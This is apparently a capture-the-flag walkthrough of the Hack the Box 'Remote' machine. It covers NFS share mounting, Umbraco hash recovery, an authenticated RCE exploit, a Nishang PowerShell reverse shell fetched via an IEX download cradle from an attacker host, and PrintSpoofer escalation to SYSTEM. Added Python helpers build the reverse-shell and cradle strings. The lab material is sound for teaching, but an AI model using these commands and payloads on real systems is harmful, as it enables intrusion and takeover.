Hack the Box - Remote - Walkthrough
Introduction
Today we're going to be doing a pentest walkthrough of the Remote machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Remote machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.1.153.
Scanning and Enumeration
We'll start by scanning all TCP ports with Nmap (-p-; the default scan only covers the 1000 most common ports):
nmap -T4 -p- 10.129.1.153
Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:
nmap -sV -p21,80,111,135,139,445,2049,5985,47001 -T4 10.129.1.153
Port 2049 is open, which is NFS. Let's see whether the server exports any shares to the network:
showmount -e 10.129.1.153
This is a great find: the /site_backups export can be mounted by anyone on the network. We can mount it into our filesystem by creating a mount point and then using the mount command (nolock avoids needing the NFS lock manager on our side):
sudo mkdir /mnt/remote
sudo mount -t nfs 10.129.1.153:/site_backups /mnt/remote -o nolock
Now let's take a look at this website backup:
ls /mnt/remote
It looks like we have Umbraco CMS on this server. We'll do a quick Google search to see where we can find some credentials:
Google search string: umbraco login credentials file
Umbraco keeps its back-office users, including their password hashes, in the App_Data/Umbraco.sdf SQL Server Compact database that is included in the backup. The file is binary, so we pull the printable runs out of it with strings and look for the admin login:
strings /mnt/remote/App_Data/Umbraco.sdf | more
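As an added example (not part of the original walkthrough), the following Python script does what the strings pipeline above does by hand: it extracts printable runs from a SQL Server Compact file, pairs each e-mail-style login with the hash stored next to it, and classifies the hash by length so you know whether a lookup table such as CrackStation can help. The bytes it scans are constructed for the demo and the hash is computed at run time from a made-up password; the real Umbraco.sdf is far larger, but its user rows surface the same way. All function names are this example's own.

```python
"""Added example, not part of the original walkthrough: a pure-Python version of
the `strings | more` hunt.  Umbraco.sdf is a SQL Server Compact database; its
user rows carry the login (an e-mail address) and the password hash as plain
printable runs, which is exactly why strings(1) surfaces them.
The bytes scanned here are CONSTRUCTED for the demo and the hash is computed at
run time from a made-up password, so no real credential is embedded."""
from __future__ import annotations

import hashlib
import re

FAKE_PASSWORD = "example-password"              # constructed; not the box's password
FAKE_SHA1 = hashlib.sha1(FAKE_PASSWORD.encode()).hexdigest()

# Constructed stand-in for a slice of Umbraco.sdf: NUL/binary padding around a
# user row for admin and a second, unprivileged user.
SAMPLE_SDF = b"".join([
    b"\x00\x01\x02\xff\xfe\x00",
    b"cmsUser\x00\x00",
    b"admin\x00\x00admin@htb.local\x00\x00",
    FAKE_SHA1.encode(), b"\x00\x00",
    b'{"hashAlgorithm":"SHA1"}\x00\x00',          # Umbraco stores the algorithm next to the hash
    b"\x07\x08smith\x00\x00smith@htb.local\x00\x00",
    hashlib.sha256(b"other-made-up-password").hexdigest().encode(), b"\x00\x00\x00\x00",
])

EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA1", 64: "SHA256"}   # hex chars per digest


def extract_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Every run of at least min_len printable ASCII bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def looks_like_hex_hash(s: str) -> str | None:
    """Name the unsalted digest a hex string could be, by length; None otherwise."""
    if re.fullmatch(r"[0-9a-fA-F]+", s):
        return HEX_DIGEST_LENGTHS.get(len(s))
    return None


def find_user_hashes(blob: bytes, window: int = 3) -> dict[str, tuple[str, str]]:
    """Pair each e-mail style login with the first hash-looking string among the
    next `window` strings.  Returns {login: (hash, algorithm guess)}."""
    runs = extract_strings(blob)
    found: dict[str, tuple[str, str]] = {}
    for i, s in enumerate(runs):
        if not EMAIL.fullmatch(s):
            continue
        for candidate in runs[i + 1:i + 1 + window]:
            algo = looks_like_hex_hash(candidate)
            if algo:
                found[s] = (candidate, algo)
                break
    return found


def lookup_table_candidate(algo: str) -> bool:
    """Plain MD5/SHA1/SHA256 digests are what CrackStation-style lookup tables
    cover; a salted or keyed scheme (e.g. HMACSHA256) needs a real cracker."""
    return algo in HEX_DIGEST_LENGTHS.values()


if __name__ == "__main__":
    for login, (digest, algo) in find_user_hashes(SAMPLE_SDF).items():
        print(f"{login}: {digest}  [{algo}, lookup table: {lookup_table_candidate(algo)}]")
```

Against the real file, replace SAMPLE_SDF with the bytes of Umbraco.sdf; the window of three strings is what makes the pairing robust to the odd column value sitting between the login and the hash.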
The output includes the admin@htb.local record with its password hash stored alongside it. We'll try throwing this admin password hash into Crackstation.net, which looks up unsalted hashes in precomputed tables:
https://crackstation.net
Let's try logging into the Umbraco CMS on the web-server:
http://10.129.1.153/umbraco
Login with username: admin@htb.local
and password: baconandcheese
We can check Umbraco's version number by clicking the user button at the top-left of the page:
Let's see if there's an exploit for this version on Searchsploit.
searchsploit umbraco 7
EDB-ID 49488 (Umbraco CMS 7.12.4 - Authenticated Remote Code Execution) matches our version exactly. Let's check it out:
searchsploit -x 49488
This looks promising. We'll copy it to our working directory and rename it for clarity:
searchsploit -m 49488 && mv 49488.py umbraRCE.py
And now to see if the exploit works, using -c to name the executable to run on the target:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c ipconfig
Finding a Way In
We have RCE on the webserver, which means we can potentially get a reverse shell via PowerShell. To do so, we need to take the following steps:
1) Download the PowerShell script that we want the victim system to execute to open our reverse shell.
2) Modify the downloaded PowerShell script so that it calls back to our attacking system.
3) Host the PowerShell script on a temporary web server so the victim can download it.
4) Start a Netcat listener on our attacking system to catch the reverse shell when it is sent.
5) Use the Python exploit to have the victim system download our PowerShell script and execute it, opening the reverse shell to our attacking system.
First, we download the PowerShell script we want to use. We'll be using a script from the Nishang GitHub repository, located here:
https://github.com/samratashok/nishang
Specifically, we'll be using this script:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
We download the script to our working directory:
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Second, we append the following line to the end of the script. The Nishang file only defines the Invoke-PowerShellTcp function; this line calls it, so the shell is opened the moment the script is loaded with IEX. Replace 10.10.99.99 with the address of your own VPN (tun0) interface:
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.99.99 -Port 53" >> Invoke-PowerShellTcp.ps1
Now the script will call back to our attacking system when it's imported.
Third, we start Python's built-in HTTP server from our working directory so the Invoke-PowerShellTcp.ps1 script can be downloaded (SimpleHTTPServer is the Python 2 module; on a current Kali where python is Python 3, the equivalent is the http.server module):
sudo python -m SimpleHTTPServer 80
Fourth, we start a Netcat listener on our attacking system in order to catch a reverse shell from the victim:
sudo nc -nlvp 53
Lastly, we send the RCE PowerShell command to the victim server using the Python exploit to open our reverse shell:
python3 umbraRCE.py -u admin@htb.local -p baconandcheese -i http://10.129.1.153 -c powershell.exe -a "-NoProfile -Command iex(New-Object Net.WebClient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')"
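The five steps above, and the PrintSpoofer command used again in the privilege escalation, all hinge on three strings being exactly right: the line appended to the Nishang script, the download cradle handed to the exploit's -a option, and the same cradle wrapped for PrintSpoofer's -c option. As an added example (not from the walkthrough), the Python script below builds and sanity-checks all three before anything is sent, and makes the append step idempotent. It assumes the walkthrough's placeholder attacker address 10.10.99.99 and port 53; the Nishang file it writes is a constructed stub, not the real script, and all function names are this example's own.

```python
"""Added example, not from the original walkthrough: builds and sanity-checks the
three strings the reverse-shell steps depend on before anything is sent.

  * the Invoke-PowerShellTcp call appended to the Nishang script (step 2),
  * the download-cradle argument passed to the Umbraco exploit's -a option (step 5),
  * the same cradle wrapped for PrintSpoofer's -c option later in the walkthrough.

Assumptions: 10.10.99.99 and port 53 are the walkthrough's placeholder attacker
address and port; the Nishang file written by demo_prepare() is a constructed
stub, not the real script."""
from __future__ import annotations

import ipaddress
import os
import shlex
import tempfile

NISHANG_FUNCTION = "Invoke-PowerShellTcp"
SCRIPT_NAME = "Invoke-PowerShellTcp.ps1"


def invoke_line(ip: str, port: int) -> str:
    """The line appended to the script so that loading it with IEX calls back."""
    ipaddress.IPv4Address(ip)                 # raises ValueError on a mistyped address
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return f"{NISHANG_FUNCTION} -Reverse -IPAddress {ip} -Port {port}"


def prepare_script(path: str, ip: str, port: int) -> str:
    """Append the invoke line exactly once and return it.

    The walkthrough's `echo ... >>` appends on every run; a second copy would
    make the victim dial back again after the first session ends, so this
    version is idempotent."""
    line = invoke_line(ip, port)
    with open(path, "r+", encoding="utf-8") as f:
        body = f.read()
        if body.rstrip().endswith(line):
            return line
        f.seek(0, os.SEEK_END)
        if body and not body.endswith("\n"):
            f.write("\n")
        f.write(line + "\n")
    return line


def download_cradle(host_ip: str, script_name: str = SCRIPT_NAME) -> str:
    """PowerShell one-liner: fetch the script over HTTP and run it in memory."""
    return f"IEX(New-Object Net.WebClient).DownloadString('http://{host_ip}/{script_name}')"


def umbraco_exploit_argv(user: str, password: str, url: str, host_ip: str,
                         exploit: str = "umbraRCE.py") -> list[str]:
    """argv for the EDB 49488 script: -c names the binary, -a its arguments.
    Keeping it as a list avoids a second layer of shell quoting around -a."""
    return ["python3", exploit, "-u", user, "-p", password, "-i", url,
            "-c", "powershell.exe",
            "-a", f"-NoProfile -Command {download_cradle(host_ip)}"]


def printspoofer_command(host_ip: str) -> str:
    """Command line typed in the foothold shell; PrintSpoofer runs -c as SYSTEM."""
    return f'.\\PrintSpoofer.exe -i -c "powershell.exe {download_cradle(host_ip)}"'


def demo_prepare(ip: str = "10.10.99.99", port: int = 53) -> str:
    """Write a constructed stand-in for the Nishang script, run prepare_script()
    twice and return the file contents: the call must appear exactly once."""
    fd, path = tempfile.mkstemp(suffix=".ps1")
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write("function Invoke-PowerShellTcp { param($IPAddress, $Port, [switch]$Reverse) }\n")
    prepare_script(path, ip, port)
    prepare_script(path, ip, port)
    with open(path, encoding="utf-8") as f:
        content = f.read()
    os.unlink(path)
    return content


if __name__ == "__main__":
    print(demo_prepare())
    print(shlex.join(umbraco_exploit_argv("admin@htb.local", "baconandcheese",
                                          "http://10.129.1.153", "10.10.99.99")))
    print(printspoofer_command("10.10.99.99"))
```

Running it prints the patched stub, the exploit command line with shell quoting applied, and the PrintSpoofer command; point prepare_script() at the real Invoke-PowerShellTcp.ps1 to patch it in place.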
Capturing the User Flag
We'll take this opportunity to capture the user flag on the system. HackTheBox Windows systems usually have the user flag placed in a user's \Desktop directory, but in this case, it's in the C:\users\public\ directory:
get-content C:\users\public\user.txt
Privilege Escalation
Examination of our current user account reveals that we have potentially exploitable privileges:
whoami /priv
Our shell holds SeImpersonatePrivilege, a privilege typically granted to service accounts such as IIS application pool identities and abused by the whole Potato family of exploits. We'll try the PrintSpoofer exploit, using this copy of itm4n's tool, which carries a pre-built PrintSpoofer.exe:
https://github.com/dievus/printspoofer
We'll need to check the target's Windows version to make sure the exploit will work: PrintSpoofer targets Windows 10, Server 2016 and Server 2019, and it also needs the Print Spooler service to be running. We're pretty sure the system is one of those, since our earlier service version scan reported IIS 10, which ships with those releases:
systeminfo
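PrintSpoofer needs two things that the two commands above reveal: an impersonation privilege in the token and a supported Windows release. As an added example (not the walkthrough's), the Python script below parses constructed excerpts of whoami /priv and systeminfo output and gives a go/no-go verdict; the hostname, build number and privilege list in the samples are invented and say nothing about this box, and the function names are this example's own.

```python
"""Added example, not from the original walkthrough: decide from `whoami /priv`
and `systeminfo` output whether PrintSpoofer is the right tool.  The two
SAMPLE_* strings are CONSTRUCTED and are not this box's output."""
from __future__ import annotations

import re

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
"""

PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.MULTILINE)

# PrintSpoofer targets the NT 10.0 line; on older hosts the same privilege is
# abused with a "Potato" variant instead.
PRINTSPOOFER_OS = ("Windows 10", "Windows Server 2016", "Windows Server 2019")
TOKEN_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")


def parse_privileges(text: str) -> dict[str, bool]:
    """{privilege: currently enabled?} from the whoami /priv table."""
    return {name: state == "Enabled" for name, state in PRIV_ROW.findall(text)}


def parse_systeminfo(text: str) -> dict[str, str]:
    """'Key: value' lines of systeminfo as a dict (split on the first colon)."""
    info: dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            info[key.strip()] = value.strip()
    return info


def token_privileges_held(privs: dict[str, bool]) -> list[str]:
    """Impersonation/assign-token privileges present in the token.  whoami lists
    a privilege whether it is Enabled or Disabled, and a held-but-Disabled
    privilege can be enabled by the process itself, so presence is what counts."""
    return [p for p in TOKEN_PRIVS if p in privs]


def printspoofer_applicable(priv_text: str, sysinfo_text: str) -> tuple[bool, str]:
    """(verdict, reason) for the PrintSpoofer route."""
    held = token_privileges_held(parse_privileges(priv_text))
    info = parse_systeminfo(sysinfo_text)
    os_name = info.get("OS Name", "")
    version = info.get("OS Version", "")
    if not held:
        return False, "token holds neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege"
    if not (version.startswith("10.0") and any(tag in os_name for tag in PRINTSPOOFER_OS)):
        return False, f"not a PrintSpoofer target: {os_name or 'unknown OS'} ({version or 'unknown version'})"
    return True, f"{', '.join(held)} held on {os_name} ({version})"


if __name__ == "__main__":
    ok, why = printspoofer_applicable(SAMPLE_WHOAMI_PRIV, SAMPLE_SYSTEMINFO)
    print(("GO: " if ok else "NO-GO: ") + why)
```

Paste the real output of the two commands into the SAMPLE_* strings to run it against a target; a no-go on the OS check is the cue to look at the other members of the Potato family rather than at PrintSpoofer.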
Everything seems to match, so first we'll download the Printspoofer binary to our working directory:
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
Now, on the Windows system, we'll move to a publicly writable directory, then download the Printspoofer executable with Certutil:
cd c:\windows\temp
certutil -urlcache -split -f http://10.10.99.99/PrintSpoofer.exe
Because a shell spawned by PrintSpoofer would be attached to the victim's console rather than to our TCP session, we won't use it to get a privileged prompt directly. Instead, we'll have it download and execute the Invoke-PowerShellTcp.ps1 script again, opening a second reverse shell for us, this one as SYSTEM:
From our attacking machine:
sudo nc -nlvp 53
A plain nc -l accepts a single client and then stops listening; the first session keeps running on its own connection, but there is no longer a listener bound to TCP port 53, so a fresh one can be started on the same port. Now, from the Windows machine, we run PrintSpoofer.exe, instructing it to use PowerShell to open our reverse shell:
.\printspoofer.exe -i -c "powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.99.99/Invoke-PowerShellTcp.ps1')"
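The point about port 53 is worth seeing rather than taking on faith. As an added example (not from the walkthrough), this Python script replays the sequence on the loopback interface: a listener that behaves like nc -l (accept one client, then stop listening), a first fake victim connecting, a second listener bound to the very same port while the first session is still alive, and a second fake victim. The addresses, the port and the two banner strings are constructed for the demo, the function names are this example's own, and no real target is involved.

```python
"""Added example, not part of the original walkthrough: why `nc -nlvp 53` can be
started a second time while the first reverse shell is still connected.

A plain `nc -l` accepts ONE client and then stops listening.  The accepted
session keeps its own 4-tuple (our IP:53 <-> victim IP:ephemeral), but there is
no LISTEN socket on :53 any more, so a fresh listener can bind there.  This
script reproduces that on loopback with two fake "victims"; banners and
addresses are constructed for the demo."""
from __future__ import annotations

import socket


def open_listener(bind_ip: str, port: int) -> socket.socket:
    """Bind and listen like `nc -l`; port 0 lets the OS pick a free port."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # nc sets SO_REUSEADDR.  Without it the second bind in demo() below fails
    # with EADDRINUSE while the first accepted session is still open.
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((bind_ip, port))
    lsock.listen(1)
    return lsock


def accept_once(lsock: socket.socket) -> socket.socket:
    """Accept a single client, then close the listening socket (nc without -k)."""
    conn, _peer = lsock.accept()
    lsock.close()
    return conn


def read_line(sock: socket.socket) -> bytes:
    """Read until a newline (or EOF) so short messages are not split."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1024)
        if not chunk:
            break
        buf += chunk
    return buf


def demo(bind_ip: str = "127.0.0.1", port: int = 0) -> dict:
    """Two listeners on the same port, one after the other, with the first
    session still alive when the second is accepted."""
    listener1 = open_listener(bind_ip, port)
    port = listener1.getsockname()[1]                    # the "53" of the walkthrough
    victim1 = socket.create_connection((bind_ip, port))  # fake foothold shell dialing in
    shell1 = accept_once(listener1)                      # listener1 is now closed
    victim1.sendall(b"foothold shell\r\n")               # constructed banner
    first = read_line(shell1)

    listener2 = open_listener(bind_ip, port)             # same port, succeeds
    victim2 = socket.create_connection((bind_ip, port))  # fake SYSTEM shell dialing in
    shell2 = accept_once(listener2)
    victim2.sendall(b"SYSTEM shell\r\n")                 # constructed banner
    second = read_line(shell2)

    shell1.sendall(b"whoami\r\n")                        # first session still usable?
    echoed = read_line(victim1)
    for s in (shell1, shell2, victim1, victim2):
        s.close()
    return {"port": port, "first": first, "second": second,
            "first_still_open": echoed == b"whoami\r\n"}


if __name__ == "__main__":
    result = demo()
    print(f"port {result['port']}: {result['first'].strip()!r} then "
          f"{result['second'].strip()!r}; first session alive: {result['first_still_open']}")
```

Without the SO_REUSEADDR line the second open_listener() call raises EADDRINUSE on Linux, which is the situation people hit when they use a listener that does not set it; with it, the behaviour matches what the walkthrough relies on.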
Capturing the Root Flag
The root flag on Hack the Box Windows systems is usually located in the Administrator user's \Desktop directory:
get-content c:\users\administrator\desktop\root.txt
Summary
After initial scans, we found a publicly accessible NFS share on the target system, and after mounting it, we recovered credentials for the Umbraco CMS running on the web server from a backup of its database. The installed version of the CMS was vulnerable to a publicly available exploit providing authenticated remote code execution, through which we established a foothold shell on the target. Enumeration of that account's privileges revealed SeImpersonatePrivilege, which permitted privilege escalation via a token impersonation exploit (PrintSpoofer); we used it to gain SYSTEM access and capture the root flag.
Finish